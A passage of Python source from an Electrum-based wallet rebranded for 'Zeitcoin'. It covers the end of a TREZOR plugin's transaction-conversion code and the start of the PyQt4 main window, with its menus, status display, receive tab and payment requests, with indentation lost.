node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation(info):
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d" % index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == constants.net.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == constants.net.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise Exception('addrtype: ' + str(addrtype))
txoutputtype.address = address
return txoutputtype
def is_any_output_on_change_branch():
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None:
index, xpubs, m = info
if index[0] == 1:
return True
return False
outputs = []
has_change = False
any_output_on_change_branch = is_any_output_on_change_branch()
for _type, address, amount in tx.outputs():
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation(info)
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum import keystore
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.invoices = gui_object.invoices
self.contacts = gui_object.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros',2))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
tabs.addTab(self.create_history_tab(), _('History') )
tabs.addTab(self.create_send_tab(), _('Send') )
tabs.addTab(self.create_receive_tab(), _('Receive') )
self.addresses_tab = self.create_addresses_tab()
if self.config.get('show_addresses_tab', False):
tabs.addTab(self.addresses_tab, _('Addresses'))
tabs.addTab(self.create_contacts_tab(), _('Contacts') )
tabs.addTab(self.create_console_tab(), _('Console') )
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def toggle_addresses_tab(self):
show_addr = not self.config.get('show_addresses_tab', False)
self.config.set_key('show_addresses_tab', show_addr)
if show_addr:
self.tabs.insertTab(3, self.addresses_tab, _('Addresses'))
else:
i = self.tabs.indexOf(self.addresses_tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
elif event in ['status', 'banner', 'verified']:
# Handle in GUI thread
self.emit(QtCore.SIGNAL('network'), event, *args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, *args):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.emit(SIGNAL('alias_received'))
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.mpk_menu.setEnabled(self.wallet.is_deterministic())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = 'Digital Zeitcoin Electrum %s - %s' % (self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Zeitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Zeitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
wallet_folder = self.get_wallet_folder()
filename = unicode(QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder))
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename = unicode( QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) )
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error), reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
wallet_folder = self.get_wallet_folder()
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
filename = line_dialog(self, _('New Wallet'), _('Enter file name')
+ ':', _('OK'), filename)
if not filename:
return
full_path = os.path.join(wallet_folder, filename)
if os.path.exists(full_path):
self.show_critical(_("File exists"))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&New contact"), self.new_contact_dialog)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.mpk_menu = wallet_menu.addAction(_("&Master Public Keys"), self.show_master_public_keys)
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addAction(_("&Export History"), self.export_history_dialog)
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Addresses"), self.toggle_addresses_tab).setShortcut(QKeySequence("Ctrl+A"))
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.run_network_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Official website"), lambda: webbrowser.open("http://electrum.org"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('Zeitcoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Zeitcoin. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Zeitcoin system."))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are more then three
tx_amount = len(self.tx_notifications)
if(tx_amount >= 3):
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
total_amount += v
self.notify(_("%(txs)s new transactions received. Total amount received in the new transactions %(amount)s") \
% { 'txs' : tx_amount, 'amount' : self.format_amount_and_units(total_amount)})
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if(v > 0):
self.notify(_("New transaction received. %(amount)s") % { 'amount' : self.format_amount_and_units(v)})
def notify(self, message):
if self.tray:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
fileName = unicode( QFileDialog.getOpenFileName(self, title, directory, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', unicode(os.path.expanduser('~')))
path = os.path.join( directory, filename )
fileName = unicode( QFileDialog.getSaveFileName(self, title, path, filter) )
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
self.connect(sender, QtCore.SIGNAL('timersignal'), self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = run_hook('format_amount_and_units', amount)
if text and x:
text += ' (%s)'%x
return text
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 8]
if self.decimal_point == 2:
return 'bits'
if self.decimal_point == 8:
return 'ZEIT'
raise Exception('Unknown base unit')
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging (%d blocks)"%server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price from exchange rate plugin
rate = run_hook('get_fiat_status_text', c + u + x)
if rate:
text += rate
icon = QIcon(":icons/status_connected.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from history_list import HistoryList
self.history_list = l = HistoryList(self)
return l
def show_address(self, addr):
import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zeitcoin address where the payment should be received. Note that each payment request uses a different Zeitcoin address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.NoFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.expires_combo = QComboBox()
self.expires_combo.addItems(map(lambda x:x[0], expiration_values))
self.expires_combo.setCurrentIndex(1)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Zeitcoin addresses.'),
_('The Zeitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = req.get('sig').decode('hex')
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = self.password_dialog(msg)
if password:
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text())
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = map(lambda x: x[1], expiration_values)[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(str(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
from electrum.wallet import Imported_Wallet
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_unused_address()
self.receive_address_e.setText(addr if addr else '')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
def toggle_qr_window(self):
import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.tabs.setCurrentIndex(2)
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = unicode(self.receive_message_e.text()).encode('utf8')
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
